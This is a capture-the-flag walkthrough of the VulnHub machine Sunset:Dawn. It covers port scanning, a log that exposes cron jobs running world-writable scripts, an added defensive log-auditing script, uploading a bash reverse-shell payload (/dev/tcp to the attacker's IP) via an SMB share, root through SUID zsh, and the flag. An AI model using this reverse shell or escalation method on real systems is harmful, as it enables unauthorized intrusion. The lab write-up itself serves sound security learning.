[VULNHUB] Sunset:Dawn

Today we are going to hack the Vulnhub machine called Sunset:Dawn. You can download it from the following link: Sunset-Dawn

Enumeration


We start with an nmap scan to see which ports are open.

~ > nmap -A -p- 192.168.1.29 
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-01 10:29 CEST
Nmap scan report for 192.168.1.29
Host is up (0.0011s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: ConnectWithDatabase, DontAllowDatabaseTableColumn, FoundRows, LongColumnFlag, SupportsTransactions, Speaks41ProtocolOld, Speaks41ProtocolNew, ODBCClient, IgnoreSigpipes, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Support41Auth, SupportsCompression, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: \qEEgYh|X#Cf[tX:V&We
|_  Auth Plugin Name: 96
Service Info: Host: DAWN

Host script results:
|_clock-skew: mean: 1h39m39s, deviation: 2h18m34s, median: 19m38s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2020-09-01T04:49:14-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-01 10:49:14
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.85 seconds

Let's explore port 80 a little further to see whether we can find any interesting directories.

~ > gobuster -u http://192.168.1.29 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.29/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2020/09/01 10:30:38 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/logs (Status: 301)
/server-status (Status: 403)
=====================================================
2020/09/01 10:30:39 Finished
=====================================================

We see there is a directory called logs. We browse to it: http://192.168.1.29/logs/ There are several .log files; we download management.log and take a look at it.

--SNIP--
2020/09/01 04:48:01 CMD: UID=0    PID=844    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2020/09/01 04:48:01 CMD: UID=0    PID=851    | /usr/sbin/CRON -f 
2020/09/01 04:48:01 CMD: UID=0    PID=850    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2020/09/01 04:48:01 CMD: UID=0    PID=849    | /bin/sh -c /home/ganimedes/phobos 
2020/09/01 04:48:01 CMD: UID=0    PID=848    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2020/09/01 04:48:01 CMD: UID=33   PID=853    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2020/09/01 04:48:01 CMD: UID=1000 PID=852    | /bin/sh -c /home/dawn/ITDEPT/product-control 
--SNIP--

We can see that scripts called web-control and product-control, located inside a folder called ITDEPT, are run periodically: root (UID=0) first makes them world-writable with chmod 777 and then they are executed by UID 33 and UID 1000. In the initial scan we saw that Samba was open, so let's take a look at it.
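The pattern in that log is the actual misconfiguration behind this box: a privileged cron job loosens permissions on files under a user's home, and other accounts then execute those files. As an added defensive example (not part of the original writeup), the following Python script parses pspy-style log lines, tracks which paths were made world-writable, and flags any later execution of those paths as well as root running anything from a user-writable tree. The sample log is constructed from the lines shown above; the untrusted directory list and the finding labels are my own assumptions.

```python
import re

# Constructed sample in the pspy-style format of management.log (modelled on the page, not the full log)
SAMPLE_LOG = """\
2020/09/01 04:48:01 CMD: UID=0    PID=844    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2020/09/01 04:48:01 CMD: UID=0    PID=851    | /usr/sbin/CRON -f
2020/09/01 04:48:01 CMD: UID=0    PID=850    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2020/09/01 04:48:01 CMD: UID=0    PID=849    | /bin/sh -c /home/ganimedes/phobos
2020/09/01 04:48:01 CMD: UID=33   PID=853    | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/09/01 04:48:01 CMD: UID=1000 PID=852    | /bin/sh -c /home/dawn/ITDEPT/product-control
"""

LINE_RE = re.compile(r"^\S+ \S+ CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\| (?P<cmd>.+)$")
CHMOD_RE = re.compile(r"\bchmod\s+(?:-R\s+)?(?P<mode>[0-7]{3,4})\s+(?P<path>\S+)")
EXEC_RE = re.compile(r"/bin/sh -c (?P<path>/\S+)$")
# Assumed list of trees that root-owned jobs should never execute from
UNTRUSTED_DIRS = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

def world_writable(mode: str) -> bool:
    """True if the octal mode grants write to 'other' (write bit set in the last digit)."""
    return int(mode[-1], 8) & 0o2 != 0

def audit(log_text: str) -> list:
    """Return (pid, uid, reason, path) tuples for risky chmod/exec patterns, in log order."""
    loosened = set()   # paths an earlier line made world-writable
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        uid, pid, cmd = int(m["uid"]), int(m["pid"]), m["cmd"].strip()
        c = CHMOD_RE.search(cmd)
        if c and world_writable(c["mode"]):
            loosened.add(c["path"])
            findings.append((pid, uid, "grants world-write", c["path"]))
            continue
        e = EXEC_RE.search(cmd)
        if not e:
            continue
        path = e["path"]
        if path in loosened:
            findings.append((pid, uid, "executes world-writable file", path))
        elif uid == 0 and path.startswith(UNTRUSTED_DIRS):
            findings.append((pid, uid, "root executes from user-writable tree", path))
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print("PID %d UID %d: %s %s" % f)
```

Run against a real pspy capture, every "executes world-writable file" hit is a file any local user (or, as here, any SMB guest) can replace before it is run.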

~ > smbclient -L 192.168.1.29
Enter WORKGROUP\sml's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

We see there is a share called ITDEPT (the same one that appears in management.log). Let's look inside it...

~ > smbclient \\\\192.168.1.29\\ITDEPT
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Aug  3 05:23:20 2019
  ..                                  D        0  Sat Aug  3 05:21:39 2019

		7158264 blocks of size 1024. 3500864 blocks available
smb: \> 

It seems to be empty. Let's create the files product-control and web-control, each containing a command that gives us a reverse shell when it runs. We'll upload them to the ITDEPT share and wait...

Low Shell


~ > nano product-control
~ > cp product-control web-control
~ > cat product-control 
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.59/7777 0>&1

We upload them to the ITDEPT share.

~ > smbclient \\\\192.168.1.29\\ITDEPT
Unable to initialize messaging context
Enter WORKGROUP\sml's password: 
Try "help" to get a list of possible commands.
smb: \> put web-control
putting file web-control as \web-control (6,0 kb/s) (average 6,0 kb/s)
smb: \> put product-control
putting file product-control as \product-control (13,4 kb/s) (average 8,3 kb/s)
smb: \> ls
  .                                   D        0  Tue Sep  1 11:05:38 2020
  ..                                  D        0  Sat Aug  3 05:21:39 2019
  web-control                         A       55  Tue Sep  1 11:05:32 2020
  product-control                     A       55  Tue Sep  1 11:05:38 2020

		7158264 blocks of size 1024. 3500820 blocks available
smb: \>

We set nc listening.

~ > nc -nlvp 7777
listening on [any] 7777 ...

And after a while...

~ > nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.1.59] from (UNKNOWN) [192.168.1.29] 44558
bash: cannot set terminal process group (1241): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dawn:~$ 

Privilege Escalation


Now that we are inside the system, we look for SUID files.

www-data@dawn:~$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dawn:~$ find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT

We see that zsh has the SUID bit set... which will let us escalate privileges. We run it.

www-data@dawn:~$ /usr/bin/zsh
/usr/bin/zsh
#id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# 

root.txt


Finally, we read the root flag :)

dawn# cd /root
#ls
flag.txt  pspy64
#cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for 
finishing the ctf, however, there is another way of getting a shell(very 
similar though). Also, 4 other methods are available for rooting this box!
flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}

End


And with that we are root on the machine.